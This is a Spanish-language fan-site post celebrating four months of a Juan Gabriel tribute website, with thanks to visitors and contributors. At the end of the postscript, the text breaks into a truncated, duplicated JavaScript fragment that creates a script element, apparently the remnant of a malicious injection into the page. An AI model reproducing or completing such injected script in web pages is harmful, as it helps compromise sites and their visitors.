Gracias por tanto…

Hoy es un día especial, hoy nuestra página web, cumple 4 meses de su presentación.

Cuando pensé hacer algo que demuestre el cariñó y admiración que tenia hacia Alberto Aguilera Valadez “Juan Gabriel” nunca pensé en llegar a tan gran proyecto, algo que nació con tan solo un teclado, una pc y un sueño, se convirtió en el sueño de todos, en el propósito de todos.

Una vez me preguntaron como haces para estar tanto tiempo trabajando, o mejor dicho publicando cosas de Juan Gabriel, y saben que no lo se solo se que aun con este gran y arduo proyecto no logro devolver lo que Juan Gabriel me entrego con su arte.

Solo 4 meses y superamos las 300.000 visitas, cuantas historias habrá detrás de cada uno de esos Fan, cuantas lágrimas compartidas habrá en cada uno de nosotros. 

El objetivo de mi sueño fue UNIR, a veces parece imposible, pero tan solo con entrar, leer y compartir lo que entre todos los fans hacemos es una manera de estarlo y eso es lo que seguramente Juan Gabriel desea para sus Fan, estar unidos por su ARTE.

Me resta solo decirles, nuevamente, gracias a todos por estar ahí junto a mí disfrutando lo que nuestro DIVO nos dio y nos dará por la eternidad. 

Y no te olvides que eres parte de nuestra página, te invitamos a enviarnos material para que podamos crecer y demostrar al mundo quien era realmente Juan Gabriel, nuestro correo juangabrielclubdefans@gmail.com

 

Agradezco a todos los que diariamente me envían cosas para publicar y no puedo dejar de dar las gracias a Gerardo Dayer quien deja gran parte de su día en la planificación e información de la web.

 

Saludos a todos, Santiago Cabral. 

 

PD: Gracias Alberto por darnos a Juan Gabriel. Por Siempre en mi mentevar d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares